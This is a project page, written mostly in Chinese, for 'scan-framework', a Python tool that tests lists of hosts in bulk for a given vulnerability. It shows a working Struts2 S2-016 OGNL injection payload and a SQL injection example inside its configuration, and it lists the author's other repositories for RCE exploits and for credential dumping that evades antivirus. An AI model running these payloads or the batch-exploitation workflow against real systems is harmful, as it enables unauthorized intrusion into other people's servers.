OneSourceCat/scan-framework OneSourceCat/scan-framework

  • Stars
    star
    106
  • Rank 325,871 (Top 7 %)
  • Language
    Python
  • Created over 9 years ago
  • Updated over 9 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
OneSourceCat/scan-framework
github

OneSourceCat

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A framework used for Vulnerability scanning

scan-framework

scan-framework是一个漏洞批量利用扫描框架,只需要进行简单配置,就可以变成一个任意漏洞批量利用的工具,前提是你必须有漏洞的payload、扫描的IP或者域名列表。

你可以使用 scan-framework:

  • 进行GET方法的形式的漏洞批量扫描
  • 进行POST方法的形式的漏洞批量扫描
  • 进行Http原始报文的漏洞批量扫描

使用步骤

  • 确保收集一个有效的漏洞探测payload
  • 有一个待扫描的IP或者域名列表
  • 触发漏洞的页面中有代表漏洞探测成功的特征字符串
  • 会使用scan-framework的配置文件
  • 入口文件为cli.py 命令行参数-m

配置文件

配置文件位于工程中的conf文件夹下:

[main]
# 扫描为真的规则(支持正则)
scan_rule = hacker
# 扫描后收集结果的规则(支持正则)
res_rule = hacker
# 扫描使用的payload
payload = redirect:${%23p%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23p.println(%22hacker%22),%23p.close()}
# 使用raw方法,放置http报文的文件
raw_file = 
# 待扫描ip列表的文件
ip_file = c:\\ip.txt
#输出结果的文件
out_file = c:\\res.txt
# 开启的线程数
thread_num = 8
# 请求的方式
method = get

上面是一个典型的get方法的漏洞扫描的配置,其中特征字符串尾hacker,扫描中可以根据scan_rule判断是否存在漏洞,使用res_rule获取漏洞触发页面上的一些信息,这个两个选项支持正则匹配,你可以写入判断依据的正则表达式,scan-framework会使用它们进行爬取。

##两种扫描方式 url模式下,可以扫描如下形式的漏洞,比如S2-016漏洞:

http://127.0.0.1:8080/struts_hello/hello?redirect:${%23p%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23p.println(%22hacker%22),%23p.close()}

如果网站有漏洞,那么在页面上会显示出hacker字符串,只需要配置:

scan_rule = hacker

上面是一种get方式的漏洞扫描。 当method = post时,payload为POST数据包中请求体,如:

username=admin' and 1=1&password=xxss&login=1

raw模式下,要求配置文件中raw_file不为空,而是指定一个保存http请求报文的文件,文件中可能是下面的形式:

GET /code/test.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 SE 2.X MetaSr 1.0
Referer: http://127.0.0.1/code/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=bv2n8m904ggt8nsi9istnm9fg7

##命令行参数

>python cli.py -h
Usage: cli.py [options]

Options:
  -h, --help            show this help message and exit
  -m MODE, --mode=MODE

选择相应的模式:

  • -m url 对应URL模式
  • -m raw 对应RAW模式

##Bug反馈 请联系: [email protected]

More Repositories

1

phpvulhunter

A tool that can scan php vulnerabilities automatically using static analysis methods
PHP
486
star
2

sqli-proxy

Python
78
star
3

SimpleZoomeye

A simple Zoomeye written by python,more details click this link: http://blog.csdn.net/u011721501/article/details/41967847
PHP
76
star
4

XxlJob-Hessian-RCE

XxlJob<=2.1.2配置不当情况下反序列化RCE
Java
66
star
5

BcelPayloadGenerator

A fastjson payload generator
Java
56
star
6

creddump

creddump bypass AV
C++
39
star
7

s2-016-exp

S2-016 Exploit && Scanner
Python
16
star
8

YonyouNC-EXP

YonyouNC RCE
Java
14
star
9

ExchangeRelayY

This is a patched version of ExchangeRelayX
JavaScript
11
star
10

batch-java-decompile

This is a small tool which can be used to decompile jars in bulk. Sometimes maybe helpful:-)
Python
6
star
11

webapp-fingerprint

可以识别Dede CMS和Discuz,并对Discuz做粗略的版本估计。
Python
5
star
12

jackson-rce-via-two-new-gadgets

Two different gadgets to bypass the blacklist in jackson-databind for RCE
2
star